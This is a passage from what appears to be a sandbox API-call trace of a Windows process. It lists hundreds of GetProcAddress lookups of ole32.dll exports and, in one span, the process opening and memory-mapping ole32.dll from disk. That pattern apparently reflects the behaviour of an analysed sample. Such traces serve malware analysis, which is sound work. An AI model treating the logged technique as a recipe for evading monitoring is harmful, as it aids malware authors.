(hModule=0x76620000, lpProcName="HPALETTE_UserSize") returned 0x76715d02 [0055.448] GetProcAddress (hModule=0x76620000, lpProcName="HPALETTE_UserUnmarshal") returned 0x76715fb1 [0055.448] GetProcAddress (hModule=0x76620000, lpProcName="HRGN_UserFree") returned 0x7675f77c [0055.449] GetProcAddress (hModule=0x76620000, lpProcName="HRGN_UserMarshal") returned 0x7675f849 [0055.449] GetProcAddress (hModule=0x76620000, lpProcName="HRGN_UserSize") returned 0x7675f806 [0055.449] GetProcAddress (hModule=0x76620000, lpProcName="HRGN_UserUnmarshal") returned 0x7675f784 [0055.449] GetProcAddress (hModule=0x76620000, lpProcName="HWND_UserFree") returned 0x7675f77c [0055.449] GetProcAddress (hModule=0x76620000, lpProcName="HWND_UserMarshal") returned 0x7675f849 [0055.449] GetProcAddress (hModule=0x76620000, lpProcName="HWND_UserSize") returned 0x7675f806 [0055.450] GetProcAddress (hModule=0x76620000, lpProcName="HWND_UserUnmarshal") returned 0x7675f784 [0055.450] GetProcAddress (hModule=0x76620000, lpProcName="HkOleRegisterObject") returned 0x766f0753 [0055.450] GetProcAddress (hModule=0x76620000, lpProcName="IIDFromString") returned 0x76632ff2 [0055.450] GetProcAddress (hModule=0x76620000, lpProcName="IsAccelerator") returned 0x766e043e [0055.450] GetProcAddress (hModule=0x76620000, lpProcName="IsEqualGUID") returned 0x766e041c [0055.451] GetProcAddress (hModule=0x76620000, lpProcName="IsValidIid") returned 0x766625a1 [0055.451] GetProcAddress (hModule=0x76620000, lpProcName="IsValidInterface") returned 0x76663d23 [0055.451] GetProcAddress (hModule=0x76620000, lpProcName="IsValidPtrIn") returned 0x76660d24 [0055.451] GetProcAddress (hModule=0x76620000, lpProcName="IsValidPtrOut") returned 0x76660d24 [0055.451] GetProcAddress (hModule=0x76620000, lpProcName="MkParseDisplayName") returned 0x7662cea9 [0055.451] GetProcAddress (hModule=0x76620000, lpProcName="MonikerCommonPrefixWith") returned 0x766eb3ed [0055.452] GetProcAddress (hModule=0x76620000, lpProcName="MonikerRelativePathTo") returned 0x766dea9b [0055.452] GetProcAddress (hModule=0x76620000, lpProcName="NdrOleInitializeExtension") returned 0x76647001 [0055.452] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction10") returned 0x766e60e8 [0055.453] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction11") returned 0x766e60ff [0055.453] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction12") returned 0x766e6116 [0055.453] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction13") returned 0x766e612d [0055.453] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction14") returned 0x766e6144 [0055.453] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction15") returned 0x766e615b [0055.453] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction16") returned 0x766e6172 [0055.453] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction17") returned 0x766e6189 [0055.454] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction18") returned 0x766e61a0 [0055.454] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction19") returned 0x766e61b7 [0055.454] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction20") returned 0x766e61ce [0055.454] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction21") returned 0x766e61e5 [0055.454] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction22") returned 0x766e61fc [0055.454] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction23") returned 0x766e6213 [0055.455] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction24") returned 0x766e622a [0055.455] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction25") returned 0x766e6241 [0055.455] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction26") returned 0x766e6258 [0055.455] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction27") returned 0x766e626f [0055.455] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction28") returned 0x766e6286 [0055.455] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction29") returned 0x766e629d [0055.455] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction3") returned 0x7669432c [0055.456] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction30") returned 0x766e62b4 [0055.467] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0055.467] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0055.467] GetModuleFileNameW (in: hModule=0x76620000, lpFilename=0x18efd8, nSize=0x104 | out: lpFilename="C:\\Windows\\syswow64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0055.468] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0055.468] CreateFileW (lpFileName="C:\\Windows\\syswow64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0055.468] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0055.468] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0055.468] GetFileSize (in: hFile=0x16c, lpFileSizeHigh=0x18efcc | out: lpFileSizeHigh=0x18efcc*=0x0) returned 0x159400 [0055.468] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0055.468] CreateFileMappingW (hFile=0x16c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x170 [0055.469] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0055.469] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x159400) returned 0x34e0000 [0055.469] GetProcAddress (hModule=0x76620000, lpProcName="BindMoniker") returned 0x7662c6a7 [0055.469] GetProcAddress (hModule=0x76620000, lpProcName="CLIPFORMAT_UserFree") returned 0x7671a976 [0055.469] GetProcAddress (hModule=0x76620000, lpProcName="CLIPFORMAT_UserMarshal") returned 0x766da9ac [0055.470] GetProcAddress (hModule=0x76620000, lpProcName="CLIPFORMAT_UserSize") returned 0x766da764 [0055.470] GetProcAddress (hModule=0x76620000, lpProcName="CLIPFORMAT_UserUnmarshal") returned 0x766dad33 [0055.470] GetProcAddress (hModule=0x76620000, lpProcName="CLSIDFromOle1Class") returned 0x766453c1 [0055.470] GetProcAddress (hModule=0x76620000, lpProcName="CLSIDFromProgID") returned 0x7664503c [0055.470] GetProcAddress (hModule=0x76620000, lpProcName="CLSIDFromProgIDEx") returned 0x76630782 [0055.471] GetProcAddress (hModule=0x76620000, lpProcName="CLSIDFromString") returned 0x7663e599 [0055.471] GetProcAddress (hModule=0x76620000, lpProcName="CoAddRefServerProcess") returned 0x76683cf3 [0055.471] GetProcAddress (hModule=0x76620000, lpProcName="CoAllowSetForegroundWindow") returned 0x7663b51e [0055.471] GetProcAddress (hModule=0x76620000, lpProcName="CoBuildVersion") returned 0x766953ae [0055.471] GetProcAddress (hModule=0x76620000, lpProcName="CoCancelCall") returned 0x766f201a [0055.472] GetProcAddress (hModule=0x76620000, lpProcName="CoCopyProxy") returned 0x76635f47 [0055.472] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateFreeThreadedMarshaler") returned 0x7663e452 [0055.472] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateGuid") returned 0x766615d5 [0055.472] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0055.472] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstanceEx") returned 0x76669d4e [0055.472] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateObjectInContext") returned 0x766f3f6b [0055.473] GetProcAddress (hModule=0x76620000, lpProcName="CoDeactivateObject") returned 0x766f1937 [0055.473] GetProcAddress (hModule=0x76620000, lpProcName="CoDisableCallCancellation") returned 0x7663d313 [0055.473] GetProcAddress (hModule=0x76620000, lpProcName="CoDisconnectContext") returned 0x76700a01 [0055.473] GetProcAddress (hModule=0x76620000, lpProcName="CoDisconnectObject") returned 0x7663e604 [0055.473] GetProcAddress (hModule=0x76620000, lpProcName="CoDosDateTimeToFileTime") returned 0x767078c9 [0055.473] GetProcAddress (hModule=0x76620000, lpProcName="CoEnableCallCancellation") returned 0x7663d2dc [0055.473] GetProcAddress (hModule=0x76620000, lpProcName="CoFileTimeNow") returned 0x76694284 [0055.474] GetProcAddress (hModule=0x76620000, lpProcName="CoFileTimeToDosDateTime") returned 0x76707875 [0055.474] GetProcAddress (hModule=0x76620000, lpProcName="CoFreeAllLibraries") returned 0x7665dec9 [0055.474] GetProcAddress (hModule=0x76620000, lpProcName="CoFreeLibrary") returned 0x76700f36 [0055.474] GetProcAddress (hModule=0x76620000, lpProcName="CoFreeUnusedLibrariesEx") returned 0x7666b661 [0055.474] GetProcAddress (hModule=0x76620000, lpProcName="CoGetActivationState") returned 0x766f173a [0055.474] GetProcAddress (hModule=0x76620000, lpProcName="CoGetApartmentID") returned 0x766f553a [0055.475] GetProcAddress (hModule=0x76620000, lpProcName="CoGetApartmentType") returned 0x76666551 [0055.475] GetProcAddress (hModule=0x76620000, lpProcName="CoGetCallContext") returned 0x7663b385 [0055.475] GetProcAddress (hModule=0x76620000, lpProcName="CoGetCallState") returned 0x766f16f3 [0055.475] GetProcAddress (hModule=0x76620000, lpProcName="CoGetCallerTID") returned 0x766ef763 [0055.475] GetProcAddress (hModule=0x76620000, lpProcName="CoGetCancelObject") returned 0x766f1f44 [0055.475] GetProcAddress (hModule=0x76620000, lpProcName="CoGetClassObject") returned 0x766554ad [0055.476] GetProcAddress (hModule=0x76620000, lpProcName="CoGetClassVersion") returned 0x766ef5d9 [0055.476] GetProcAddress (hModule=0x76620000, lpProcName="CoGetComCatalog") returned 0x76665d65 [0055.476] GetProcAddress (hModule=0x76620000, lpProcName="CoGetContextToken") returned 0x7665ecab [0055.476] GetProcAddress (hModule=0x76620000, lpProcName="CoGetCurrentLogicalThreadId") returned 0x766af66e [0055.476] GetProcAddress (hModule=0x76620000, lpProcName="CoGetCurrentProcess") returned 0x766996f9 [0055.476] GetProcAddress (hModule=0x76620000, lpProcName="CoGetDefaultContext") returned 0x766af0c9 [0055.477] GetProcAddress (hModule=0x76620000, lpProcName="CoGetInstanceFromFile") returned 0x766e340b [0055.477] GetProcAddress (hModule=0x76620000, lpProcName="CoGetInstanceFromIStorage") returned 0x76700f07 [0055.477] GetProcAddress (hModule=0x76620000, lpProcName="CoGetInterceptor") returned 0x7670c71d [0055.477] GetProcAddress (hModule=0x76620000, lpProcName="CoGetInterceptorFromTypeInfo") returned 0x7662a7d6 [0055.477] GetProcAddress (hModule=0x76620000, lpProcName="CoGetInterfaceAndReleaseStream") returned 0x7664418c [0055.477] GetProcAddress (hModule=0x76620000, lpProcName="CoGetMalloc") returned 0x76666265 [0055.478] GetProcAddress (hModule=0x76620000, lpProcName="CoGetMarshalSizeMax") returned 0x7664f1eb [0055.478] GetProcAddress (hModule=0x76620000, lpProcName="CoGetModuleType") returned 0x76704d5a [0055.478] GetProcAddress (hModule=0x76620000, lpProcName="CoGetObject") returned 0x7667b68d [0055.478] GetProcAddress (hModule=0x76620000, lpProcName="CoGetObjectContext") returned 0x7666632b [0055.478] GetProcAddress (hModule=0x76620000, lpProcName="CoGetPSClsid") returned 0x766426b9 [0055.478] GetProcAddress (hModule=0x76620000, lpProcName="CoGetProcessIdentifier") returned 0x766f169e [0055.479] GetProcAddress (hModule=0x76620000, lpProcName="CoGetStandardMarshal") returned 0x766995f0 [0055.479] GetProcAddress (hModule=0x76620000, lpProcName="CoGetStdMarshalEx") returned 0x766f17c2 [0055.479] GetProcAddress (hModule=0x76620000, lpProcName="CoGetSystemSecurityPermissions") returned 0x766f16c9 [0055.479] GetProcAddress (hModule=0x76620000, lpProcName="CoGetTreatAsClass") returned 0x7664a72f [0055.479] GetProcAddress (hModule=0x76620000, lpProcName="CoImpersonateClient") returned 0x7662fed0 [0055.479] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0055.480] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeEx") returned 0x766609ad [0055.480] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0055.480] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeWOW") returned 0x766e1104 [0055.480] GetProcAddress (hModule=0x76620000, lpProcName="CoInstall") returned 0x76701007 [0055.480] GetProcAddress (hModule=0x76620000, lpProcName="CoInvalidateRemoteMachineBindings") returned 0x766f1656 [0055.480] GetProcAddress (hModule=0x76620000, lpProcName="CoIsHandlerConnected") returned 0x766e39b5 [0055.480] GetProcAddress (hModule=0x76620000, lpProcName="CoIsOle1Class") returned 0x7668186a [0055.481] GetProcAddress (hModule=0x76620000, lpProcName="CoLoadLibrary") returned 0x766942dc [0055.481] GetProcAddress (hModule=0x76620000, lpProcName="CoLockObjectExternal") returned 0x766ae871 [0055.481] GetProcAddress (hModule=0x76620000, lpProcName="CoMarshalHresult") returned 0x766ef73e [0055.481] GetProcAddress (hModule=0x76620000, lpProcName="CoMarshalInterThreadInterfaceInStream") returned 0x7664405d [0055.481] GetProcAddress (hModule=0x76620000, lpProcName="CoMarshalInterface") returned 0x7664ef03 [0055.481] GetProcAddress (hModule=0x76620000, lpProcName="CoPopServiceDomain") returned 0x766f635e [0055.482] GetProcAddress (hModule=0x76620000, lpProcName="CoPushServiceDomain") returned 0x766f6323 [0055.482] GetProcAddress (hModule=0x76620000, lpProcName="CoQueryAuthenticationServices") returned 0x766f2a11 [0055.482] GetProcAddress (hModule=0x76620000, lpProcName="CoQueryClientBlanket") returned 0x766246ee [0055.482] GetProcAddress (hModule=0x76620000, lpProcName="CoQueryProxyBlanket") returned 0x76656224 [0055.482] GetProcAddress (hModule=0x76620000, lpProcName="CoQueryReleaseObject") returned 0x766effdb [0055.482] GetProcAddress (hModule=0x76620000, lpProcName="CoReactivateObject") returned 0x766f15de [0055.482] GetProcAddress (hModule=0x76620000, lpProcName="CoRegisterChannelHook") returned 0x7664dfb1 [0055.483] GetProcAddress (hModule=0x76620000, lpProcName="CoRegisterClassObject") returned 0x766321e1 [0055.483] GetProcAddress (hModule=0x76620000, lpProcName="CoRegisterInitializeSpy") returned 0x76667660 [0055.483] GetProcAddress (hModule=0x76620000, lpProcName="CoRegisterMallocSpy") returned 0x766f04f7 [0055.483] GetProcAddress (hModule=0x76620000, lpProcName="CoRegisterMessageFilter") returned 0x766565f9 [0055.483] GetProcAddress (hModule=0x76620000, lpProcName="CoRegisterPSClsid") returned 0x7662c56e [0055.483] GetProcAddress (hModule=0x76620000, lpProcName="CoRegisterSurrogate") returned 0x767009bf [0055.484] GetProcAddress (hModule=0x76620000, lpProcName="CoRegisterSurrogateEx") returned 0x7663a789 [0055.484] GetProcAddress (hModule=0x76620000, lpProcName="CoReleaseMarshalData") returned 0x7663bc22 [0055.484] GetProcAddress (hModule=0x76620000, lpProcName="CoReleaseServerProcess") returned 0x76684314 [0055.484] GetProcAddress (hModule=0x76620000, lpProcName="CoResumeClassObjects") returned 0x7662ea02 [0055.484] GetProcAddress (hModule=0x76620000, lpProcName="CoRetireServer") returned 0x766f167a [0055.484] GetProcAddress (hModule=0x76620000, lpProcName="CoRevertToSelf") returned 0x76630065 [0055.485] GetProcAddress (hModule=0x76620000, lpProcName="CoRevokeClassObject") returned 0x766aeacf [0055.485] GetProcAddress (hModule=0x76620000, lpProcName="CoRevokeInitializeSpy") returned 0x76669784 [0055.485] GetProcAddress (hModule=0x76620000, lpProcName="CoRevokeMallocSpy") returned 0x766f0081 [0055.485] GetProcAddress (hModule=0x76620000, lpProcName="CoSetCancelObject") returned 0x766f2104 [0055.485] GetProcAddress (hModule=0x76620000, lpProcName="CoSetProxyBlanket") returned 0x76635ea5 [0055.485] GetProcAddress (hModule=0x76620000, lpProcName="CoSetState") returned 0x76662705 [0055.486] GetProcAddress (hModule=0x76620000, lpProcName="CoSuspendClassObjects") returned 0x7668bb02 [0055.486] GetProcAddress (hModule=0x76620000, lpProcName="CoSwitchCallContext") returned 0x7663009c [0055.486] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemAlloc") returned 0x7666ea4c [0055.486] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemFree") returned 0x76676f41 [0055.486] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemRealloc") returned 0x7665ee39 [0055.486] GetProcAddress (hModule=0x76620000, lpProcName="CoTestCancel") returned 0x766f205a [0055.487] GetProcAddress (hModule=0x76620000, lpProcName="CoTreatAsClass") returned 0x766efc51 [0055.487] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0055.487] GetProcAddress (hModule=0x76620000, lpProcName="CoUnloadingWOW") returned 0x766e118b [0055.487] GetProcAddress (hModule=0x76620000, lpProcName="CoUnmarshalHresult") returned 0x766e1158 [0055.487] GetProcAddress (hModule=0x76620000, lpProcName="CoUnmarshalInterface") returned 0x7664f150 [0055.487] GetProcAddress (hModule=0x76620000, lpProcName="CoVrfCheckThreadState") returned 0x766fe27f [0055.488] GetProcAddress (hModule=0x76620000, lpProcName="CoVrfGetThreadState") returned 0x766fdec5 [0055.488] GetProcAddress (hModule=0x76620000, lpProcName="CoVrfReleaseThreadState") returned 0x766fde43 [0055.488] GetProcAddress (hModule=0x76620000, lpProcName="CoWaitForMultipleHandles") returned 0x7663617a [0055.488] GetProcAddress (hModule=0x76620000, lpProcName="ComPs_NdrDllCanUnloadNow") returned 0x766625a1 [0055.488] GetProcAddress (hModule=0x76620000, lpProcName="ComPs_NdrDllGetClassObject") returned 0x7670c883 [0055.488] GetProcAddress (hModule=0x76620000, lpProcName="ComPs_NdrDllRegisterProxy") returned 0x7670cf23 [0055.489] GetProcAddress (hModule=0x76620000, lpProcName="ComPs_NdrDllUnregisterProxy") returned 0x7670cf47 [0055.489] GetProcAddress (hModule=0x76620000, lpProcName="CreateAntiMoniker") returned 0x766e9aca [0055.489] GetProcAddress (hModule=0x76620000, lpProcName="CreateBindCtx") returned 0x76666d2c [0055.489] GetProcAddress (hModule=0x76620000, lpProcName="CreateClassMoniker") returned 0x76684b60 [0055.490] GetProcAddress (hModule=0x76620000, lpProcName="CreateDataAdviseHolder") returned 0x7669de5b [0055.490] GetProcAddress (hModule=0x76620000, lpProcName="CreateDataCache") returned 0x766a0a0a [0055.490] GetProcAddress (hModule=0x76620000, lpProcName="CreateErrorInfo") returned 0x76632bda [0055.491] GetProcAddress (hModule=0x76620000, lpProcName="CreateFileMoniker") returned 0x766a2bf2 [0055.491] GetProcAddress (hModule=0x76620000, lpProcName="CreateGenericComposite") returned 0x7668492e [0055.491] GetProcAddress (hModule=0x76620000, lpProcName="CreateILockBytesOnHGlobal") returned 0x7668c0b2 [0055.491] GetProcAddress (hModule=0x76620000, lpProcName="CreateItemMoniker") returned 0x766adda2 [0055.491] GetProcAddress (hModule=0x76620000, lpProcName="CreateObjrefMoniker") returned 0x766e9b07 [0055.491] GetProcAddress (hModule=0x76620000, lpProcName="CreateOleAdviseHolder") returned 0x7669bbde [0055.492] GetProcAddress (hModule=0x76620000, lpProcName="CreatePointerMoniker") returned 0x7662d5f6 [0055.492] GetProcAddress (hModule=0x76620000, lpProcName="CreateStdProgressIndicator") returned 0x766ebec3 [0055.492] GetProcAddress (hModule=0x76620000, lpProcName="CreateStreamOnHGlobal") returned 0x7664363b [0055.492] GetProcAddress (hModule=0x76620000, lpProcName="DcomChannelSetHResult") returned 0x76678c0b [0055.492] GetProcAddress (hModule=0x76620000, lpProcName="DllDebugObjectRPCHook") returned 0x7675f66f [0055.492] GetProcAddress (hModule=0x76620000, lpProcName="DllGetClassObject") returned 0x76646a49 [0055.493] GetProcAddress (hModule=0x76620000, lpProcName="DllGetClassObjectWOW") returned 0x76646a49 [0055.493] GetProcAddress (hModule=0x76620000, lpProcName="DllRegisterServer") returned 0x766eff7f [0055.493] GetProcAddress (hModule=0x76620000, lpProcName="DoDragDrop") returned 0x7672a827 [0055.493] GetProcAddress (hModule=0x76620000, lpProcName="EnableHookObject") returned 0x766f0cb6 [0055.493] GetProcAddress (hModule=0x76620000, lpProcName="FmtIdToPropStgName") returned 0x7673aab1 [0055.493] GetProcAddress (hModule=0x76620000, lpProcName="FreePropVariantArray") returned 0x76632d6d [0055.493] GetProcAddress (hModule=0x76620000, lpProcName="GetClassFile") returned 0x766ec090 [0055.494] GetProcAddress (hModule=0x76620000, lpProcName="GetConvertStg") returned 0x76724db6 [0055.494] GetProcAddress (hModule=0x76620000, lpProcName="GetDocumentBitStg") returned 0x76724d63 [0055.494] GetProcAddress (hModule=0x76620000, lpProcName="GetErrorInfo") returned 0x7665ecdc [0055.494] GetProcAddress (hModule=0x76620000, lpProcName="GetHGlobalFromILockBytes") returned 0x766e2747 [0055.494] GetProcAddress (hModule=0x76620000, lpProcName="GetHGlobalFromStream") returned 0x766441d5 [0055.494] GetProcAddress (hModule=0x76620000, lpProcName="GetHookInterface") returned 0x766f0734 [0055.495] GetProcAddress (hModule=0x76620000, lpProcName="GetRunningObjectTable") returned 0x766adb21 [0055.495] GetProcAddress (hModule=0x76620000, lpProcName="HACCEL_UserFree") returned 0x7675f77c [0055.495] GetProcAddress (hModule=0x76620000, lpProcName="HACCEL_UserMarshal") returned 0x7675f849 [0055.495] GetProcAddress (hModule=0x76620000, lpProcName="HACCEL_UserSize") returned 0x7675f806 [0055.495] GetProcAddress (hModule=0x76620000, lpProcName="HACCEL_UserUnmarshal") returned 0x7675f784 [0055.495] GetProcAddress (hModule=0x76620000, lpProcName="HBITMAP_UserFree") returned 0x76685443 [0055.495] GetProcAddress (hModule=0x76620000, lpProcName="HBITMAP_UserMarshal") returned 0x766853a5 [0055.496] GetProcAddress (hModule=0x76620000, lpProcName="HBITMAP_UserSize") returned 0x76685345 [0055.496] GetProcAddress (hModule=0x76620000, lpProcName="HBITMAP_UserUnmarshal") returned 0x7668546d [0055.496] GetProcAddress (hModule=0x76620000, lpProcName="HBRUSH_UserFree") returned 0x7675f77c [0055.496] GetProcAddress (hModule=0x76620000, lpProcName="HBRUSH_UserMarshal") returned 0x7675f849 [0055.496] GetProcAddress (hModule=0x76620000, lpProcName="HBRUSH_UserSize") returned 0x7675f806 [0055.496] GetProcAddress (hModule=0x76620000, lpProcName="HBRUSH_UserUnmarshal") returned 0x7675f784 [0055.497] GetProcAddress (hModule=0x76620000, lpProcName="HDC_UserFree") returned 0x7675f77c [0055.497] GetProcAddress (hModule=0x76620000, lpProcName="HDC_UserMarshal") returned 0x7675f849 [0055.497] GetProcAddress (hModule=0x76620000, lpProcName="HDC_UserSize") returned 0x7675f806 [0055.497] GetProcAddress (hModule=0x76620000, lpProcName="HDC_UserUnmarshal") returned 0x7675f784 [0055.497] GetProcAddress (hModule=0x76620000, lpProcName="HENHMETAFILE_UserFree") returned 0x76715af7 [0055.497] GetProcAddress (hModule=0x76620000, lpProcName="HENHMETAFILE_UserMarshal") returned 0x76715960 [0055.497] GetProcAddress (hModule=0x76620000, lpProcName="HENHMETAFILE_UserSize") returned 0x76715919 [0055.498] GetProcAddress (hModule=0x76620000, lpProcName="HENHMETAFILE_UserUnmarshal") returned 0x76715ab1 [0055.498] GetProcAddress (hModule=0x76620000, lpProcName="HGLOBAL_UserFree") returned 0x766861ba [0055.498] GetProcAddress (hModule=0x76620000, lpProcName="HGLOBAL_UserMarshal") returned 0x766860de [0055.498] GetProcAddress (hModule=0x76620000, lpProcName="HGLOBAL_UserSize") returned 0x76686165 [0055.498] GetProcAddress (hModule=0x76620000, lpProcName="HGLOBAL_UserUnmarshal") returned 0x766861ee [0055.498] GetProcAddress (hModule=0x76620000, lpProcName="HICON_UserFree") returned 0x7675f77c [0055.499] GetProcAddress (hModule=0x76620000, lpProcName="HICON_UserMarshal") returned 0x7675f849 [0055.499] GetProcAddress (hModule=0x76620000, lpProcName="HICON_UserSize") returned 0x7675f806 [0055.499] GetProcAddress (hModule=0x76620000, lpProcName="HICON_UserUnmarshal") returned 0x7675f784 [0055.499] GetProcAddress (hModule=0x76620000, lpProcName="HMENU_UserFree") returned 0x7675f77c [0055.499] GetProcAddress (hModule=0x76620000, lpProcName="HMENU_UserMarshal") returned 0x7675f849 [0055.499] GetProcAddress (hModule=0x76620000, lpProcName="HMENU_UserSize") returned 0x7675f806 [0055.499] GetProcAddress (hModule=0x76620000, lpProcName="HMENU_UserUnmarshal") returned 0x7675f784 [0055.500] GetProcAddress (hModule=0x76620000, lpProcName="HMETAFILEPICT_UserFree") returned 0x767158b9 [0055.500] GetProcAddress (hModule=0x76620000, lpProcName="HMETAFILEPICT_UserMarshal") returned 0x766da843 [0055.500] GetProcAddress (hModule=0x76620000, lpProcName="HMETAFILEPICT_UserSize") returned 0x766da939 [0055.500] GetProcAddress (hModule=0x76620000, lpProcName="HMETAFILEPICT_UserUnmarshal") returned 0x766da7fd [0055.500] GetProcAddress (hModule=0x76620000, lpProcName="HMETAFILE_UserFree") returned 0x76715cd8 [0055.500] GetProcAddress (hModule=0x76620000, lpProcName="HMETAFILE_UserMarshal") returned 0x76715b68 [0055.500] GetProcAddress (hModule=0x76620000, lpProcName="HMETAFILE_UserSize") returned 0x76715b21 [0055.501] GetProcAddress (hModule=0x76620000, lpProcName="HMETAFILE_UserUnmarshal") returned 0x76715c05 [0055.501] GetProcAddress (hModule=0x76620000, lpProcName="HPALETTE_UserFree") returned 0x76685443 [0055.501] GetProcAddress (hModule=0x76620000, lpProcName="HPALETTE_UserMarshal") returned 0x76715d4a [0055.501] GetProcAddress (hModule=0x76620000, lpProcName="HPALETTE_UserSize") returned 0x76715d02 [0055.501] GetProcAddress (hModule=0x76620000, lpProcName="HPALETTE_UserUnmarshal") returned 0x76715fb1 [0055.501] GetProcAddress (hModule=0x76620000, lpProcName="HRGN_UserFree") returned 0x7675f77c [0055.502] GetProcAddress (hModule=0x76620000, lpProcName="HRGN_UserMarshal") returned 0x7675f849 [0055.502] GetProcAddress (hModule=0x76620000, lpProcName="HRGN_UserSize") returned 0x7675f806 [0055.502] GetProcAddress (hModule=0x76620000, lpProcName="HRGN_UserUnmarshal") returned 0x7675f784 [0055.502] GetProcAddress (hModule=0x76620000, lpProcName="HWND_UserFree") returned 0x7675f77c [0055.502] GetProcAddress (hModule=0x76620000, lpProcName="HWND_UserMarshal") returned 0x7675f849 [0055.502] GetProcAddress (hModule=0x76620000, lpProcName="HWND_UserSize") returned 0x7675f806 [0055.503] GetProcAddress (hModule=0x76620000, lpProcName="HWND_UserUnmarshal") returned 0x7675f784 [0055.503] GetProcAddress (hModule=0x76620000, lpProcName="HkOleRegisterObject") returned 0x766f0753 [0055.503] GetProcAddress (hModule=0x76620000, lpProcName="IIDFromString") returned 0x76632ff2 [0055.503] GetProcAddress (hModule=0x76620000, lpProcName="IsAccelerator") returned 0x766e043e [0055.503] GetProcAddress (hModule=0x76620000, lpProcName="IsEqualGUID") returned 0x766e041c [0055.503] GetProcAddress (hModule=0x76620000, lpProcName="IsValidIid") returned 0x766625a1 [0055.503] GetProcAddress (hModule=0x76620000, lpProcName="IsValidInterface") returned 0x76663d23 [0055.504] GetProcAddress (hModule=0x76620000, lpProcName="IsValidPtrIn") returned 0x76660d24 [0055.504] GetProcAddress (hModule=0x76620000, lpProcName="IsValidPtrOut") returned 0x76660d24 [0055.504] GetProcAddress (hModule=0x76620000, lpProcName="MkParseDisplayName") returned 0x7662cea9 [0055.504] GetProcAddress (hModule=0x76620000, lpProcName="MonikerCommonPrefixWith") returned 0x766eb3ed [0055.504] GetProcAddress (hModule=0x76620000, lpProcName="MonikerRelativePathTo") returned 0x766dea9b [0055.504] GetProcAddress (hModule=0x76620000, lpProcName="NdrOleInitializeExtension") returned 0x76647001 [0055.504] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction10") returned 0x766e60e8 [0055.505] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction11") returned 0x766e60ff [0055.505] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction12") returned 0x766e6116 [0055.505] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction13") returned 0x766e612d [0055.505] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction14") returned 0x766e6144 [0055.505] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction15") returned 0x766e615b [0055.505] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction16") returned 0x766e6172 [0055.506] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction17") returned 0x766e6189 [0055.506] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction18") returned 0x766e61a0 [0055.506] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction19") returned 0x766e61b7 [0055.506] GetProcAddress (hModule=0x76620000, lpProcName="NdrProxyForwardingFunction20") returned 0x766e61ce [0055.506] GetProcAddress (hModule=0x76620000, 